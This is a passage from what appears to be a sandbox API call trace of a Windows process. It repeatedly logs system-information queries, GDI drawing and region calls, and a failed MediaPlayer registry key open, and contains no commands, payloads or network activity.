(in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.312] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.312] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.313] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.313] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.313] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.313] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.313] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.313] BeginPath (hdc=0x0) returned 0 [0092.313] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.313] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.313] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.313] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.313] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.313] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.313] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.313] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.313] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.313] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.313] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.313] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.313] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.313] BeginPath (hdc=0x0) returned 0 [0092.313] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.313] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.313] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.314] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.314] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.314] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.314] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.314] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.314] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.314] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.314] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.314] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.314] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.314] BeginPath (hdc=0x0) returned 0 [0092.314] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.314] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.314] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.314] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.314] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.314] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.314] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.314] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.337] CreateSolidBrush (color=0xff) returned 0x21077c2 [0092.337] CreateSolidBrush (color=0xff0000) returned 0x11077c5 [0092.337] DeleteObject (ho=0x11077c5) returned 1 [0092.337] DeleteObject (ho=0x9f0401d9) returned 1 [0092.337] DeleteObject (ho=0x9d0401dc) returned 1 [0092.337] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.337] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.337] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.337] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.337] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.337] BeginPath (hdc=0x0) returned 0 [0092.337] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.338] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.338] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.338] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.338] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.338] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.338] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.338] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.338] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa00401d9 [0092.338] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9e0401dc [0092.338] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477c6 [0092.338] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477c7 [0092.338] CombineRgn (hrgnDst=0x10477c6, hrgnSrc1=0xa00401d9, hrgnSrc2=0x9e0401dc, iMode=1) returned 1 [0092.338] CombineRgn (hrgnDst=0x10477c7, hrgnSrc1=0xa00401d9, hrgnSrc2=0x9e0401dc, iMode=4) returned 2 [0092.338] CreateSolidBrush (color=0xff) returned 0x21077c5 [0092.338] CreateSolidBrush (color=0xff0000) returned 0x11077c8 [0092.338] DeleteObject (ho=0x11077c8) returned 1 [0092.338] DeleteObject (ho=0x9e0401dc) returned 1 [0092.338] DeleteObject (ho=0xa00401d9) returned 1 [0092.339] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.339] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.339] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.339] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.339] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.339] BeginPath (hdc=0x0) returned 0 [0092.339] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.339] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.339] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.339] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.339] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.339] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.339] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.339] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.339] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9f0401dc [0092.339] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa10401d9 [0092.339] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477c9 [0092.339] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477ca [0092.339] CombineRgn (hrgnDst=0x10477c9, hrgnSrc1=0x9f0401dc, hrgnSrc2=0xa10401d9, iMode=1) returned 1 [0092.339] CombineRgn (hrgnDst=0x10477ca, hrgnSrc1=0x9f0401dc, hrgnSrc2=0xa10401d9, iMode=4) returned 2 [0092.339] CreateSolidBrush (color=0xff) returned 0x21077c8 [0092.339] CreateSolidBrush (color=0xff0000) returned 0x11077cb [0092.339] DeleteObject (ho=0x11077cb) returned 1 [0092.339] DeleteObject (ho=0xa10401d9) returned 1 [0092.339] DeleteObject (ho=0x9f0401dc) returned 1 [0092.340] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.340] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.340] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.340] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.340] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.340] BeginPath (hdc=0x0) returned 0 [0092.340] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.340] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.340] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.340] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.340] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.340] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.340] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.340] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.340] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa20401d9 [0092.340] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa00401dc [0092.340] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477cc [0092.340] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477cd [0092.340] CombineRgn (hrgnDst=0x10477cc, hrgnSrc1=0xa20401d9, hrgnSrc2=0xa00401dc, iMode=1) returned 1 [0092.340] CombineRgn (hrgnDst=0x10477cd, hrgnSrc1=0xa20401d9, hrgnSrc2=0xa00401dc, iMode=4) returned 2 [0092.340] CreateSolidBrush (color=0xff) returned 0x21077cb [0092.340] CreateSolidBrush (color=0xff0000) returned 0x11077ce [0092.340] DeleteObject (ho=0x11077ce) returned 1 [0092.340] DeleteObject (ho=0xa00401dc) returned 1 [0092.341] DeleteObject (ho=0xa20401d9) returned 1 [0092.341] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.341] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.341] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.341] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.341] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.341] BeginPath (hdc=0x0) returned 0 [0092.341] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.341] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.341] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.341] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.341] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.341] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.341] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.341] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.341] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa10401dc [0092.341] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa30401d9 [0092.341] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477cf [0092.341] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477d0 [0092.341] CombineRgn (hrgnDst=0x10477cf, hrgnSrc1=0xa10401dc, hrgnSrc2=0xa30401d9, iMode=1) returned 1 [0092.341] CombineRgn (hrgnDst=0x10477d0, hrgnSrc1=0xa10401dc, hrgnSrc2=0xa30401d9, iMode=4) returned 2 [0092.341] CreateSolidBrush (color=0xff) returned 0x21077ce [0092.341] CreateSolidBrush (color=0xff0000) returned 0x11077d1 [0092.341] DeleteObject (ho=0x11077d1) returned 1 [0092.341] DeleteObject (ho=0xa30401d9) returned 1 [0092.341] DeleteObject (ho=0xa10401dc) returned 1 [0092.341] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.341] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.342] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.342] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.342] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.342] BeginPath (hdc=0x0) returned 0 [0092.342] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.342] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.342] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.342] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.342] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.342] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.342] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.342] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.342] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa40401d9 [0092.342] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa20401dc [0092.342] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477d2 [0092.342] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477d3 [0092.342] CombineRgn (hrgnDst=0x10477d2, hrgnSrc1=0xa40401d9, hrgnSrc2=0xa20401dc, iMode=1) returned 1 [0092.342] CombineRgn (hrgnDst=0x10477d3, hrgnSrc1=0xa40401d9, hrgnSrc2=0xa20401dc, iMode=4) returned 2 [0092.342] CreateSolidBrush (color=0xff) returned 0x21077d1 [0092.342] CreateSolidBrush (color=0xff0000) returned 0x11077d4 [0092.342] DeleteObject (ho=0x11077d4) returned 1 [0092.342] DeleteObject (ho=0xa20401dc) returned 1 [0092.342] DeleteObject (ho=0xa40401d9) returned 1 [0092.342] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.342] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.342] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.342] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.343] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.343] BeginPath (hdc=0x0) returned 0 [0092.343] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.343] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.343] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.343] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.343] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.343] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.343] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.343] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.343] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa30401dc [0092.343] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa50401d9 [0092.343] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477d5 [0092.343] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477d6 [0092.343] CombineRgn (hrgnDst=0x10477d5, hrgnSrc1=0xa30401dc, hrgnSrc2=0xa50401d9, iMode=1) returned 1 [0092.343] CombineRgn (hrgnDst=0x10477d6, hrgnSrc1=0xa30401dc, hrgnSrc2=0xa50401d9, iMode=4) returned 2 [0092.343] CreateSolidBrush (color=0xff) returned 0x21077d4 [0092.343] CreateSolidBrush (color=0xff0000) returned 0x11077d7 [0092.343] DeleteObject (ho=0x11077d7) returned 1 [0092.343] DeleteObject (ho=0xa50401d9) returned 1 [0092.343] DeleteObject (ho=0xa30401dc) returned 1 [0092.343] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.343] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.343] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.343] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.344] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.344] BeginPath (hdc=0x0) returned 0 [0092.344] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.344] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.344] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.344] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.344] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.344] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.344] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.344] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.344] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa60401d9 [0092.344] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa40401dc [0092.344] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477d8 [0092.344] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10477d9 [0092.344] CombineRgn (hrgnDst=0x10477d8, hrgnSrc1=0xa60401d9, hrgnSrc2=0xa40401dc, iMode=1) returned 1 [0092.344] CombineRgn (hrgnDst=0x10477d9, hrgnSrc1=0xa60401d9, hrgnSrc2=0xa40401dc, iMode=4) returned 2 [0092.344] CreateSolidBrush (color=0xff) returned 0x21077d7 [0092.344] CreateSolidBrush (color=0xff0000) returned 0x11077da [0092.344] DeleteObject (ho=0x11077da) returned 1 [0092.344] DeleteObject (ho=0xa40401dc) returned 1 [0092.344] DeleteObject (ho=0xa60401d9) returned 1 [0092.344] 